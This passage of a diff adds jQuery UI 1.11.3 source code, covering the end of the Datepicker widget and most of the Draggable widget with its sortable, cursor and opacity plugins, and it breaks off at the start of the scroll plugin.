+		return ((!minDate || date.getTime() >= minDate.getTime()) &&
+			(!maxDate || date.getTime() <= maxDate.getTime()) &&
+			(!minYear || date.getFullYear() >= minYear) &&
+			(!maxYear || date.getFullYear() <= maxYear));
+	},
+
+	/* Provide the configuration settings for formatting/parsing. */
+	_getFormatConfig: function(inst) {
+		var shortYearCutoff = this._get(inst, "shortYearCutoff");
+		shortYearCutoff = (typeof shortYearCutoff !== "string" ? shortYearCutoff :
+			new Date().getFullYear() % 100 + parseInt(shortYearCutoff, 10));
+		return {shortYearCutoff: shortYearCutoff,
+			dayNamesShort: this._get(inst, "dayNamesShort"), dayNames: this._get(inst, "dayNames"),
+			monthNamesShort: this._get(inst, "monthNamesShort"), monthNames: this._get(inst, "monthNames")};
+	},
+
+	/* Format the given date for display. */
+	_formatDate: function(inst, day, month, year) {
+		if (!day) {
+			inst.currentDay = inst.selectedDay;
+			inst.currentMonth = inst.selectedMonth;
+			inst.currentYear = inst.selectedYear;
+		}
+		var date = (day ? (typeof day === "object" ? day :
+			this._daylightSavingAdjust(new Date(year, month, day))) :
+			this._daylightSavingAdjust(new Date(inst.currentYear, inst.currentMonth, inst.currentDay)));
+		return this.formatDate(this._get(inst, "dateFormat"), date, this._getFormatConfig(inst));
+	}
+});
+
+/*
+ * Bind hover events for datepicker elements.
+ * Done via delegate so the binding only occurs once in the lifetime of the parent div.
+ * Global datepicker_instActive, set by _updateDatepicker allows the handlers to find their way back to the active picker.
+ */
+function datepicker_bindHover(dpDiv) {
+	var selector = "button, .ui-datepicker-prev, .ui-datepicker-next, .ui-datepicker-calendar td a";
+	return dpDiv.delegate(selector, "mouseout", function() {
+			$(this).removeClass("ui-state-hover");
+			if (this.className.indexOf("ui-datepicker-prev") !== -1) {
+				$(this).removeClass("ui-datepicker-prev-hover");
+			}
+			if (this.className.indexOf("ui-datepicker-next") !== -1) {
+				$(this).removeClass("ui-datepicker-next-hover");
+			}
+		})
+		.delegate( selector, "mouseover", datepicker_handleMouseover );
+}
+
+function datepicker_handleMouseover() {
+	if (!$.datepicker._isDisabledDatepicker( datepicker_instActive.inline? datepicker_instActive.dpDiv.parent()[0] : datepicker_instActive.input[0])) {
+		$(this).parents(".ui-datepicker-calendar").find("a").removeClass("ui-state-hover");
+		$(this).addClass("ui-state-hover");
+		if (this.className.indexOf("ui-datepicker-prev") !== -1) {
+			$(this).addClass("ui-datepicker-prev-hover");
+		}
+		if (this.className.indexOf("ui-datepicker-next") !== -1) {
+			$(this).addClass("ui-datepicker-next-hover");
+		}
+	}
+}
+
+/* jQuery extend now ignores nulls! */
+function datepicker_extendRemove(target, props) {
+	$.extend(target, props);
+	for (var name in props) {
+		if (props[name] == null) {
+			target[name] = props[name];
+		}
+	}
+	return target;
+}
+
+/* Invoke the datepicker functionality.
+   @param  options  string - a command, optionally followed by additional parameters or
+					Object - settings for attaching new datepicker functionality
+   @return  jQuery object */
+$.fn.datepicker = function(options){
+
+	/* Verify an empty collection wasn't passed - Fixes #6976 */
+	if ( !this.length ) {
+		return this;
+	}
+
+	/* Initialise the date picker. */
+	if (!$.datepicker.initialized) {
+		$(document).mousedown($.datepicker._checkExternalClick);
+		$.datepicker.initialized = true;
+	}
+
+	/* Append datepicker main container to body if not exist. */
+	if ($("#"+$.datepicker._mainDivId).length === 0) {
+		$("body").append($.datepicker.dpDiv);
+	}
+
+	var otherArgs = Array.prototype.slice.call(arguments, 1);
+	if (typeof options === "string" && (options === "isDisabled" || options === "getDate" || options === "widget")) {
+		return $.datepicker["_" + options + "Datepicker"].
+			apply($.datepicker, [this[0]].concat(otherArgs));
+	}
+	if (options === "option" && arguments.length === 2 && typeof arguments[1] === "string") {
+		return $.datepicker["_" + options + "Datepicker"].
+			apply($.datepicker, [this[0]].concat(otherArgs));
+	}
+	return this.each(function() {
+		typeof options === "string" ?
+			$.datepicker["_" + options + "Datepicker"].
+				apply($.datepicker, [this].concat(otherArgs)) :
+			$.datepicker._attachDatepicker(this, options);
+	});
+};
+
+$.datepicker = new Datepicker(); // singleton instance
+$.datepicker.initialized = false;
+$.datepicker.uuid = new Date().getTime();
+$.datepicker.version = "1.11.3";
+
+var datepicker = $.datepicker;
+
+
+/*!
+ * jQuery UI Draggable 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/draggable/
+ */
+
+
+$.widget("ui.draggable", $.ui.mouse, {
+	version: "1.11.3",
+	widgetEventPrefix: "drag",
+	options: {
+		addClasses: true,
+		appendTo: "parent",
+		axis: false,
+		connectToSortable: false,
+		containment: false,
+		cursor: "auto",
+		cursorAt: false,
+		grid: false,
+		handle: false,
+		helper: "original",
+		iframeFix: false,
+		opacity: false,
+		refreshPositions: false,
+		revert: false,
+		revertDuration: 500,
+		scope: "default",
+		scroll: true,
+		scrollSensitivity: 20,
+		scrollSpeed: 20,
+		snap: false,
+		snapMode: "both",
+		snapTolerance: 20,
+		stack: false,
+		zIndex: false,
+
+		// callbacks
+		drag: null,
+		start: null,
+		stop: null
+	},
+	_create: function() {
+
+		if ( this.options.helper === "original" ) {
+			this._setPositionRelative();
+		}
+		if (this.options.addClasses){
+			this.element.addClass("ui-draggable");
+		}
+		if (this.options.disabled){
+			this.element.addClass("ui-draggable-disabled");
+		}
+		this._setHandleClassName();
+
+		this._mouseInit();
+	},
+
+	_setOption: function( key, value ) {
+		this._super( key, value );
+		if ( key === "handle" ) {
+			this._removeHandleClassName();
+			this._setHandleClassName();
+		}
+	},
+
+	_destroy: function() {
+		if ( ( this.helper || this.element ).is( ".ui-draggable-dragging" ) ) {
+			this.destroyOnClear = true;
+			return;
+		}
+		this.element.removeClass( "ui-draggable ui-draggable-dragging ui-draggable-disabled" );
+		this._removeHandleClassName();
+		this._mouseDestroy();
+	},
+
+	_mouseCapture: function(event) {
+		var o = this.options;
+
+		this._blurActiveElement( event );
+
+		// among others, prevent a drag on a resizable-handle
+		if (this.helper || o.disabled || $(event.target).closest(".ui-resizable-handle").length > 0) {
+			return false;
+		}
+
+		//Quit if we're not on a valid handle
+		this.handle = this._getHandle(event);
+		if (!this.handle) {
+			return false;
+		}
+
+		this._blockFrames( o.iframeFix === true ? "iframe" : o.iframeFix );
+
+		return true;
+
+	},
+
+	_blockFrames: function( selector ) {
+		this.iframeBlocks = this.document.find( selector ).map(function() {
+			var iframe = $( this );
+
+			return $( "<div>" )
+				.css( "position", "absolute" )
+				.appendTo( iframe.parent() )
+				.outerWidth( iframe.outerWidth() )
+				.outerHeight( iframe.outerHeight() )
+				.offset( iframe.offset() )[ 0 ];
+		});
+	},
+
+	_unblockFrames: function() {
+		if ( this.iframeBlocks ) {
+			this.iframeBlocks.remove();
+			delete this.iframeBlocks;
+		}
+	},
+
+	_blurActiveElement: function( event ) {
+		var document = this.document[ 0 ];
+
+		// Only need to blur if the event occurred on the draggable itself, see #10527
+		if ( !this.handleElement.is( event.target ) ) {
+			return;
+		}
+
+		// support: IE9
+		// IE9 throws an "Unspecified error" accessing document.activeElement from an <iframe>
+		try {
+
+			// Support: IE9, IE10
+			// If the <body> is blurred, IE will switch windows, see #9520
+			if ( document.activeElement && document.activeElement.nodeName.toLowerCase() !== "body" ) {
+
+				// Blur any element that currently has focus, see #4261
+				$( document.activeElement ).blur();
+			}
+		} catch ( error ) {}
+	},
+
+	_mouseStart: function(event) {
+
+		var o = this.options;
+
+		//Create and append the visible helper
+		this.helper = this._createHelper(event);
+
+		this.helper.addClass("ui-draggable-dragging");
+
+		//Cache the helper size
+		this._cacheHelperProportions();
+
+		//If ddmanager is used for droppables, set the global draggable
+		if ($.ui.ddmanager) {
+			$.ui.ddmanager.current = this;
+		}
+
+		/*
+		 * - Position generation -
+		 * This block generates everything position related - it's the core of draggables.
+		 */
+
+		//Cache the margins of the original element
+		this._cacheMargins();
+
+		//Store the helper's css position
+		this.cssPosition = this.helper.css( "position" );
+		this.scrollParent = this.helper.scrollParent( true );
+		this.offsetParent = this.helper.offsetParent();
+		this.hasFixedAncestor = this.helper.parents().filter(function() {
+				return $( this ).css( "position" ) === "fixed";
+			}).length > 0;
+
+		//The element's absolute position on the page minus margins
+		this.positionAbs = this.element.offset();
+		this._refreshOffsets( event );
+
+		//Generate the original position
+		this.originalPosition = this.position = this._generatePosition( event, false );
+		this.originalPageX = event.pageX;
+		this.originalPageY = event.pageY;
+
+		//Adjust the mouse offset relative to the helper if "cursorAt" is supplied
+		(o.cursorAt && this._adjustOffsetFromHelper(o.cursorAt));
+
+		//Set a containment if given in the options
+		this._setContainment();
+
+		//Trigger event + callbacks
+		if (this._trigger("start", event) === false) {
+			this._clear();
+			return false;
+		}
+
+		//Recache the helper size
+		this._cacheHelperProportions();
+
+		//Prepare the droppable offsets
+		if ($.ui.ddmanager && !o.dropBehaviour) {
+			$.ui.ddmanager.prepareOffsets(this, event);
+		}
+
+		// Reset helper's right/bottom css if they're set and set explicit width/height instead
+		// as this prevents resizing of elements with right/bottom set (see #7772)
+		this._normalizeRightBottom();
+
+		this._mouseDrag(event, true); //Execute the drag once - this causes the helper not to be visible before getting its correct position
+
+		//If the ddmanager is used for droppables, inform the manager that dragging has started (see #5003)
+		if ( $.ui.ddmanager ) {
+			$.ui.ddmanager.dragStart(this, event);
+		}
+
+		return true;
+	},
+
+	_refreshOffsets: function( event ) {
+		this.offset = {
+			top: this.positionAbs.top - this.margins.top,
+			left: this.positionAbs.left - this.margins.left,
+			scroll: false,
+			parent: this._getParentOffset(),
+			relative: this._getRelativeOffset()
+		};
+
+		this.offset.click = {
+			left: event.pageX - this.offset.left,
+			top: event.pageY - this.offset.top
+		};
+	},
+
+	_mouseDrag: function(event, noPropagation) {
+		// reset any necessary cached properties (see #5009)
+		if ( this.hasFixedAncestor ) {
+			this.offset.parent = this._getParentOffset();
+		}
+
+		//Compute the helpers position
+		this.position = this._generatePosition( event, true );
+		this.positionAbs = this._convertPositionTo("absolute");
+
+		//Call plugins and callbacks and use the resulting position if something is returned
+		if (!noPropagation) {
+			var ui = this._uiHash();
+			if (this._trigger("drag", event, ui) === false) {
+				this._mouseUp({});
+				return false;
+			}
+			this.position = ui.position;
+		}
+
+		this.helper[ 0 ].style.left = this.position.left + "px";
+		this.helper[ 0 ].style.top = this.position.top + "px";
+
+		if ($.ui.ddmanager) {
+			$.ui.ddmanager.drag(this, event);
+		}
+
+		return false;
+	},
+
+	_mouseStop: function(event) {
+
+		//If we are using droppables, inform the manager about the drop
+		var that = this,
+			dropped = false;
+		if ($.ui.ddmanager && !this.options.dropBehaviour) {
+			dropped = $.ui.ddmanager.drop(this, event);
+		}
+
+		//if a drop comes from outside (a sortable)
+		if (this.dropped) {
+			dropped = this.dropped;
+			this.dropped = false;
+		}
+
+		if ((this.options.revert === "invalid" && !dropped) || (this.options.revert === "valid" && dropped) || this.options.revert === true || ($.isFunction(this.options.revert) && this.options.revert.call(this.element, dropped))) {
+			$(this.helper).animate(this.originalPosition, parseInt(this.options.revertDuration, 10), function() {
+				if (that._trigger("stop", event) !== false) {
+					that._clear();
+				}
+			});
+		} else {
+			if (this._trigger("stop", event) !== false) {
+				this._clear();
+			}
+		}
+
+		return false;
+	},
+
+	_mouseUp: function( event ) {
+		this._unblockFrames();
+
+		//If the ddmanager is used for droppables, inform the manager that dragging has stopped (see #5003)
+		if ( $.ui.ddmanager ) {
+			$.ui.ddmanager.dragStop(this, event);
+		}
+
+		// Only need to focus if the event occurred on the draggable itself, see #10527
+		if ( this.handleElement.is( event.target ) ) {
+			// The interaction is over; whether or not the click resulted in a drag, focus the element
+			this.element.focus();
+		}
+
+		return $.ui.mouse.prototype._mouseUp.call(this, event);
+	},
+
+	cancel: function() {
+
+		if (this.helper.is(".ui-draggable-dragging")) {
+			this._mouseUp({});
+		} else {
+			this._clear();
+		}
+
+		return this;
+
+	},
+
+	_getHandle: function(event) {
+		return this.options.handle ?
+			!!$( event.target ).closest( this.element.find( this.options.handle ) ).length :
+			true;
+	},
+
+	_setHandleClassName: function() {
+		this.handleElement = this.options.handle ?
+			this.element.find( this.options.handle ) : this.element;
+		this.handleElement.addClass( "ui-draggable-handle" );
+	},
+
+	_removeHandleClassName: function() {
+		this.handleElement.removeClass( "ui-draggable-handle" );
+	},
+
+	_createHelper: function(event) {
+
+		var o = this.options,
+			helperIsFunction = $.isFunction( o.helper ),
+			helper = helperIsFunction ?
+				$( o.helper.apply( this.element[ 0 ], [ event ] ) ) :
+				( o.helper === "clone" ?
+					this.element.clone().removeAttr( "id" ) :
+					this.element );
+
+		if (!helper.parents("body").length) {
+			helper.appendTo((o.appendTo === "parent" ? this.element[0].parentNode : o.appendTo));
+		}
+
+		// http://bugs.jqueryui.com/ticket/9446
+		// a helper function can return the original element
+		// which wouldn't have been set to relative in _create
+		if ( helperIsFunction && helper[ 0 ] === this.element[ 0 ] ) {
+			this._setPositionRelative();
+		}
+
+		if (helper[0] !== this.element[0] && !(/(fixed|absolute)/).test(helper.css("position"))) {
+			helper.css("position", "absolute");
+		}
+
+		return helper;
+
+	},
+
+	_setPositionRelative: function() {
+		if ( !( /^(?:r|a|f)/ ).test( this.element.css( "position" ) ) ) {
+			this.element[ 0 ].style.position = "relative";
+		}
+	},
+
+	_adjustOffsetFromHelper: function(obj) {
+		if (typeof obj === "string") {
+			obj = obj.split(" ");
+		}
+		if ($.isArray(obj)) {
+			obj = { left: +obj[0], top: +obj[1] || 0 };
+		}
+		if ("left" in obj) {
+			this.offset.click.left = obj.left + this.margins.left;
+		}
+		if ("right" in obj) {
+			this.offset.click.left = this.helperProportions.width - obj.right + this.margins.left;
+		}
+		if ("top" in obj) {
+			this.offset.click.top = obj.top + this.margins.top;
+		}
+		if ("bottom" in obj) {
+			this.offset.click.top = this.helperProportions.height - obj.bottom + this.margins.top;
+		}
+	},
+
+	_isRootNode: function( element ) {
+		return ( /(html|body)/i ).test( element.tagName ) || element === this.document[ 0 ];
+	},
+
+	_getParentOffset: function() {
+
+		//Get the offsetParent and cache its position
+		var po = this.offsetParent.offset(),
+			document = this.document[ 0 ];
+
+		// This is a special case where we need to modify a offset calculated on start, since the following happened:
+		// 1. The position of the helper is absolute, so it's position is calculated based on the next positioned parent
+		// 2. The actual offset parent is a child of the scroll parent, and the scroll parent isn't the document, which means that
+		//    the scroll is included in the initial calculation of the offset of the parent, and never recalculated upon drag
+		if (this.cssPosition === "absolute" && this.scrollParent[0] !== document && $.contains(this.scrollParent[0], this.offsetParent[0])) {
+			po.left += this.scrollParent.scrollLeft();
+			po.top += this.scrollParent.scrollTop();
+		}
+
+		if ( this._isRootNode( this.offsetParent[ 0 ] ) ) {
+			po = { top: 0, left: 0 };
+		}
+
+		return {
+			top: po.top + (parseInt(this.offsetParent.css("borderTopWidth"), 10) || 0),
+			left: po.left + (parseInt(this.offsetParent.css("borderLeftWidth"), 10) || 0)
+		};
+
+	},
+
+	_getRelativeOffset: function() {
+		if ( this.cssPosition !== "relative" ) {
+			return { top: 0, left: 0 };
+		}
+
+		var p = this.element.position(),
+			scrollIsRootNode = this._isRootNode( this.scrollParent[ 0 ] );
+
+		return {
+			top: p.top - ( parseInt(this.helper.css( "top" ), 10) || 0 ) + ( !scrollIsRootNode ? this.scrollParent.scrollTop() : 0 ),
+			left: p.left - ( parseInt(this.helper.css( "left" ), 10) || 0 ) + ( !scrollIsRootNode ? this.scrollParent.scrollLeft() : 0 )
+		};
+
+	},
+
+	_cacheMargins: function() {
+		this.margins = {
+			left: (parseInt(this.element.css("marginLeft"), 10) || 0),
+			top: (parseInt(this.element.css("marginTop"), 10) || 0),
+			right: (parseInt(this.element.css("marginRight"), 10) || 0),
+			bottom: (parseInt(this.element.css("marginBottom"), 10) || 0)
+		};
+	},
+
+	_cacheHelperProportions: function() {
+		this.helperProportions = {
+			width: this.helper.outerWidth(),
+			height: this.helper.outerHeight()
+		};
+	},
+
+	_setContainment: function() {
+
+		var isUserScrollable, c, ce,
+			o = this.options,
+			document = this.document[ 0 ];
+
+		this.relativeContainer = null;
+
+		if ( !o.containment ) {
+			this.containment = null;
+			return;
+		}
+
+		if ( o.containment === "window" ) {
+			this.containment = [
+				$( window ).scrollLeft() - this.offset.relative.left - this.offset.parent.left,
+				$( window ).scrollTop() - this.offset.relative.top - this.offset.parent.top,
+				$( window ).scrollLeft() + $( window ).width() - this.helperProportions.width - this.margins.left,
+				$( window ).scrollTop() + ( $( window ).height() || document.body.parentNode.scrollHeight ) - this.helperProportions.height - this.margins.top
+			];
+			return;
+		}
+
+		if ( o.containment === "document") {
+			this.containment = [
+				0,
+				0,
+				$( document ).width() - this.helperProportions.width - this.margins.left,
+				( $( document ).height() || document.body.parentNode.scrollHeight ) - this.helperProportions.height - this.margins.top
+			];
+			return;
+		}
+
+		if ( o.containment.constructor === Array ) {
+			this.containment = o.containment;
+			return;
+		}
+
+		if ( o.containment === "parent" ) {
+			o.containment = this.helper[ 0 ].parentNode;
+		}
+
+		c = $( o.containment );
+		ce = c[ 0 ];
+
+		if ( !ce ) {
+			return;
+		}
+
+		isUserScrollable = /(scroll|auto)/.test( c.css( "overflow" ) );
+
+		this.containment = [
+			( parseInt( c.css( "borderLeftWidth" ), 10 ) || 0 ) + ( parseInt( c.css( "paddingLeft" ), 10 ) || 0 ),
+			( parseInt( c.css( "borderTopWidth" ), 10 ) || 0 ) + ( parseInt( c.css( "paddingTop" ), 10 ) || 0 ),
+			( isUserScrollable ? Math.max( ce.scrollWidth, ce.offsetWidth ) : ce.offsetWidth ) -
+				( parseInt( c.css( "borderRightWidth" ), 10 ) || 0 ) -
+				( parseInt( c.css( "paddingRight" ), 10 ) || 0 ) -
+				this.helperProportions.width -
+				this.margins.left -
+				this.margins.right,
+			( isUserScrollable ? Math.max( ce.scrollHeight, ce.offsetHeight ) : ce.offsetHeight ) -
+				( parseInt( c.css( "borderBottomWidth" ), 10 ) || 0 ) -
+				( parseInt( c.css( "paddingBottom" ), 10 ) || 0 ) -
+				this.helperProportions.height -
+				this.margins.top -
+				this.margins.bottom
+		];
+		this.relativeContainer = c;
+	},
+
+	_convertPositionTo: function(d, pos) {
+
+		if (!pos) {
+			pos = this.position;
+		}
+
+		var mod = d === "absolute" ? 1 : -1,
+			scrollIsRootNode = this._isRootNode( this.scrollParent[ 0 ] );
+
+		return {
+			top: (
+				pos.top	+																// The absolute mouse position
+				this.offset.relative.top * mod +										// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.top * mod -										// The offsetParent's offset without borders (offset + border)
+				( ( this.cssPosition === "fixed" ? -this.offset.scroll.top : ( scrollIsRootNode ? 0 : this.offset.scroll.top ) ) * mod)
+			),
+			left: (
+				pos.left +																// The absolute mouse position
+				this.offset.relative.left * mod +										// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.left * mod	-										// The offsetParent's offset without borders (offset + border)
+				( ( this.cssPosition === "fixed" ? -this.offset.scroll.left : ( scrollIsRootNode ? 0 : this.offset.scroll.left ) ) * mod)
+			)
+		};
+
+	},
+
+	_generatePosition: function( event, constrainPosition ) {
+
+		var containment, co, top, left,
+			o = this.options,
+			scrollIsRootNode = this._isRootNode( this.scrollParent[ 0 ] ),
+			pageX = event.pageX,
+			pageY = event.pageY;
+
+		// Cache the scroll
+		if ( !scrollIsRootNode || !this.offset.scroll ) {
+			this.offset.scroll = {
+				top: this.scrollParent.scrollTop(),
+				left: this.scrollParent.scrollLeft()
+			};
+		}
+
+		/*
+		 * - Position constraining -
+		 * Constrain the position to a mix of grid, containment.
+		 */
+
+		// If we are not dragging yet, we won't check for options
+		if ( constrainPosition ) {
+			if ( this.containment ) {
+				if ( this.relativeContainer ){
+					co = this.relativeContainer.offset();
+					containment = [
+						this.containment[ 0 ] + co.left,
+						this.containment[ 1 ] + co.top,
+						this.containment[ 2 ] + co.left,
+						this.containment[ 3 ] + co.top
+					];
+				} else {
+					containment = this.containment;
+				}
+
+				if (event.pageX - this.offset.click.left < containment[0]) {
+					pageX = containment[0] + this.offset.click.left;
+				}
+				if (event.pageY - this.offset.click.top < containment[1]) {
+					pageY = containment[1] + this.offset.click.top;
+				}
+				if (event.pageX - this.offset.click.left > containment[2]) {
+					pageX = containment[2] + this.offset.click.left;
+				}
+				if (event.pageY - this.offset.click.top > containment[3]) {
+					pageY = containment[3] + this.offset.click.top;
+				}
+			}
+
+			if (o.grid) {
+				//Check for grid elements set to 0 to prevent divide by 0 error causing invalid argument errors in IE (see ticket #6950)
+				top = o.grid[1] ? this.originalPageY + Math.round((pageY - this.originalPageY) / o.grid[1]) * o.grid[1] : this.originalPageY;
+				pageY = containment ? ((top - this.offset.click.top >= containment[1] || top - this.offset.click.top > containment[3]) ? top : ((top - this.offset.click.top >= containment[1]) ? top - o.grid[1] : top + o.grid[1])) : top;
+
+				left = o.grid[0] ? this.originalPageX + Math.round((pageX - this.originalPageX) / o.grid[0]) * o.grid[0] : this.originalPageX;
+				pageX = containment ? ((left - this.offset.click.left >= containment[0] || left - this.offset.click.left > containment[2]) ? left : ((left - this.offset.click.left >= containment[0]) ? left - o.grid[0] : left + o.grid[0])) : left;
+			}
+
+			if ( o.axis === "y" ) {
+				pageX = this.originalPageX;
+			}
+
+			if ( o.axis === "x" ) {
+				pageY = this.originalPageY;
+			}
+		}
+
+		return {
+			top: (
+				pageY -																	// The absolute mouse position
+				this.offset.click.top	-												// Click offset (relative to the element)
+				this.offset.relative.top -												// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.top +												// The offsetParent's offset without borders (offset + border)
+				( this.cssPosition === "fixed" ? -this.offset.scroll.top : ( scrollIsRootNode ? 0 : this.offset.scroll.top ) )
+			),
+			left: (
+				pageX -																	// The absolute mouse position
+				this.offset.click.left -												// Click offset (relative to the element)
+				this.offset.relative.left -												// Only for relative positioned nodes: Relative offset from element to offset parent
+				this.offset.parent.left +												// The offsetParent's offset without borders (offset + border)
+				( this.cssPosition === "fixed" ? -this.offset.scroll.left : ( scrollIsRootNode ? 0 : this.offset.scroll.left ) )
+			)
+		};
+
+	},
+
+	_clear: function() {
+		this.helper.removeClass("ui-draggable-dragging");
+		if (this.helper[0] !== this.element[0] && !this.cancelHelperRemoval) {
+			this.helper.remove();
+		}
+		this.helper = null;
+		this.cancelHelperRemoval = false;
+		if ( this.destroyOnClear ) {
+			this.destroy();
+		}
+	},
+
+	_normalizeRightBottom: function() {
+		if ( this.options.axis !== "y" && this.helper.css( "right" ) !== "auto" ) {
+			this.helper.width( this.helper.width() );
+			this.helper.css( "right", "auto" );
+		}
+		if ( this.options.axis !== "x" && this.helper.css( "bottom" ) !== "auto" ) {
+			this.helper.height( this.helper.height() );
+			this.helper.css( "bottom", "auto" );
+		}
+	},
+
+	// From now on bulk stuff - mainly helpers
+
+	_trigger: function( type, event, ui ) {
+		ui = ui || this._uiHash();
+		$.ui.plugin.call( this, type, [ event, ui, this ], true );
+
+		// Absolute position and offset (see #6884 ) have to be recalculated after plugins
+		if ( /^(drag|start|stop)/.test( type ) ) {
+			this.positionAbs = this._convertPositionTo( "absolute" );
+			ui.offset = this.positionAbs;
+		}
+		return $.Widget.prototype._trigger.call( this, type, event, ui );
+	},
+
+	plugins: {},
+
+	_uiHash: function() {
+		return {
+			helper: this.helper,
+			position: this.position,
+			originalPosition: this.originalPosition,
+			offset: this.positionAbs
+		};
+	}
+
+});
+
+$.ui.plugin.add( "draggable", "connectToSortable", {
+	start: function( event, ui, draggable ) {
+		var uiSortable = $.extend( {}, ui, {
+			item: draggable.element
+		});
+
+		draggable.sortables = [];
+		$( draggable.options.connectToSortable ).each(function() {
+			var sortable = $( this ).sortable( "instance" );
+
+			if ( sortable && !sortable.options.disabled ) {
+				draggable.sortables.push( sortable );
+
+				// refreshPositions is called at drag start to refresh the containerCache
+				// which is used in drag. This ensures it's initialized and synchronized
+				// with any changes that might have happened on the page since initialization.
+				sortable.refreshPositions();
+				sortable._trigger("activate", event, uiSortable);
+			}
+		});
+	},
+	stop: function( event, ui, draggable ) {
+		var uiSortable = $.extend( {}, ui, {
+			item: draggable.element
+		});
+
+		draggable.cancelHelperRemoval = false;
+
+		$.each( draggable.sortables, function() {
+			var sortable = this;
+
+			if ( sortable.isOver ) {
+				sortable.isOver = 0;
+
+				// Allow this sortable to handle removing the helper
+				draggable.cancelHelperRemoval = true;
+				sortable.cancelHelperRemoval = false;
+
+				// Use _storedCSS To restore properties in the sortable,
+				// as this also handles revert (#9675) since the draggable
+				// may have modified them in unexpected ways (#8809)
+				sortable._storedCSS = {
+					position: sortable.placeholder.css( "position" ),
+					top: sortable.placeholder.css( "top" ),
+					left: sortable.placeholder.css( "left" )
+				};
+
+				sortable._mouseStop(event);
+
+				// Once drag has ended, the sortable should return to using
+				// its original helper, not the shared helper from draggable
+				sortable.options.helper = sortable.options._helper;
+			} else {
+				// Prevent this Sortable from removing the helper.
+				// However, don't set the draggable to remove the helper
+				// either as another connected Sortable may yet handle the removal.
+				sortable.cancelHelperRemoval = true;
+
+				sortable._trigger( "deactivate", event, uiSortable );
+			}
+		});
+	},
+	drag: function( event, ui, draggable ) {
+		$.each( draggable.sortables, function() {
+			var innermostIntersecting = false,
+				sortable = this;
+
+			// Copy over variables that sortable's _intersectsWith uses
+			sortable.positionAbs = draggable.positionAbs;
+			sortable.helperProportions = draggable.helperProportions;
+			sortable.offset.click = draggable.offset.click;
+
+			if ( sortable._intersectsWith( sortable.containerCache ) ) {
+				innermostIntersecting = true;
+
+				$.each( draggable.sortables, function() {
+					// Copy over variables that sortable's _intersectsWith uses
+					this.positionAbs = draggable.positionAbs;
+					this.helperProportions = draggable.helperProportions;
+					this.offset.click = draggable.offset.click;
+
+					if ( this !== sortable &&
+							this._intersectsWith( this.containerCache ) &&
+							$.contains( sortable.element[ 0 ], this.element[ 0 ] ) ) {
+						innermostIntersecting = false;
+					}
+
+					return innermostIntersecting;
+				});
+			}
+
+			if ( innermostIntersecting ) {
+				// If it intersects, we use a little isOver variable and set it once,
+				// so that the move-in stuff gets fired only once.
+				if ( !sortable.isOver ) {
+					sortable.isOver = 1;
+
+					sortable.currentItem = ui.helper
+						.appendTo( sortable.element )
+						.data( "ui-sortable-item", true );
+
+					// Store helper option to later restore it
+					sortable.options._helper = sortable.options.helper;
+
+					sortable.options.helper = function() {
+						return ui.helper[ 0 ];
+					};
+
+					// Fire the start events of the sortable with our passed browser event,
+					// and our own helper (so it doesn't create a new one)
+					event.target = sortable.currentItem[ 0 ];
+					sortable._mouseCapture( event, true );
+					sortable._mouseStart( event, true, true );
+
+					// Because the browser event is way off the new appended portlet,
+					// modify necessary variables to reflect the changes
+					sortable.offset.click.top = draggable.offset.click.top;
+					sortable.offset.click.left = draggable.offset.click.left;
+					sortable.offset.parent.left -= draggable.offset.parent.left -
+						sortable.offset.parent.left;
+					sortable.offset.parent.top -= draggable.offset.parent.top -
+						sortable.offset.parent.top;
+
+					draggable._trigger( "toSortable", event );
+
+					// Inform draggable that the helper is in a valid drop zone,
+					// used solely in the revert option to handle "valid/invalid".
+					draggable.dropped = sortable.element;
+
+					// Need to refreshPositions of all sortables in the case that
+					// adding to one sortable changes the location of the other sortables (#9675)
+					$.each( draggable.sortables, function() {
+						this.refreshPositions();
+					});
+
+					// hack so receive/update callbacks work (mostly)
+					draggable.currentItem = draggable.element;
+					sortable.fromOutside = draggable;
+				}
+
+				if ( sortable.currentItem ) {
+					sortable._mouseDrag( event );
+					// Copy the sortable's position because the draggable's can potentially reflect
+					// a relative position, while sortable is always absolute, which the dragged
+					// element has now become. (#8809)
+					ui.position = sortable.position;
+				}
+			} else {
+				// If it doesn't intersect with the sortable, and it intersected before,
+				// we fake the drag stop of the sortable, but make sure it doesn't remove
+				// the helper by using cancelHelperRemoval.
+				if ( sortable.isOver ) {
+
+					sortable.isOver = 0;
+					sortable.cancelHelperRemoval = true;
+
+					// Calling sortable's mouseStop would trigger a revert,
+					// so revert must be temporarily false until after mouseStop is called.
+					sortable.options._revert = sortable.options.revert;
+					sortable.options.revert = false;
+
+					sortable._trigger( "out", event, sortable._uiHash( sortable ) );
+					sortable._mouseStop( event, true );
+
+					// restore sortable behaviors that were modfied
+					// when the draggable entered the sortable area (#9481)
+					sortable.options.revert = sortable.options._revert;
+					sortable.options.helper = sortable.options._helper;
+
+					if ( sortable.placeholder ) {
+						sortable.placeholder.remove();
+					}
+
+					// Recalculate the draggable's offset considering the sortable
+					// may have modified them in unexpected ways (#8809)
+					draggable._refreshOffsets( event );
+					ui.position = draggable._generatePosition( event, true );
+
+					draggable._trigger( "fromSortable", event );
+
+					// Inform draggable that the helper is no longer in a valid drop zone
+					draggable.dropped = false;
+
+					// Need to refreshPositions of all sortables just in case removing
+					// from one sortable changes the location of other sortables (#9675)
+					$.each( draggable.sortables, function() {
+						this.refreshPositions();
+					});
+				}
+			}
+		});
+	}
+});
+
+$.ui.plugin.add("draggable", "cursor", {
+	start: function( event, ui, instance ) {
+		var t = $( "body" ),
+			o = instance.options;
+
+		if (t.css("cursor")) {
+			o._cursor = t.css("cursor");
+		}
+		t.css("cursor", o.cursor);
+	},
+	stop: function( event, ui, instance ) {
+		var o = instance.options;
+		if (o._cursor) {
+			$("body").css("cursor", o._cursor);
+		}
+	}
+});
+
+$.ui.plugin.add("draggable", "opacity", {
+	start: function( event, ui, instance ) {
+		var t = $( ui.helper ),
+			o = instance.options;
+		if (t.css("opacity")) {
+			o._opacity = t.css("opacity");
+		}
+		t.css("opacity", o.opacity);
+	},
+	stop: function( event, ui, instance ) {
+		var o = instance.options;
+		if (o._opacity) {
+			$(ui.helper).css("opacity", o._opacity);
+		}
+	}
+});
+
+$.ui.plugin.add("draggable", "scroll", {
+	start: function( event, ui, i ) {
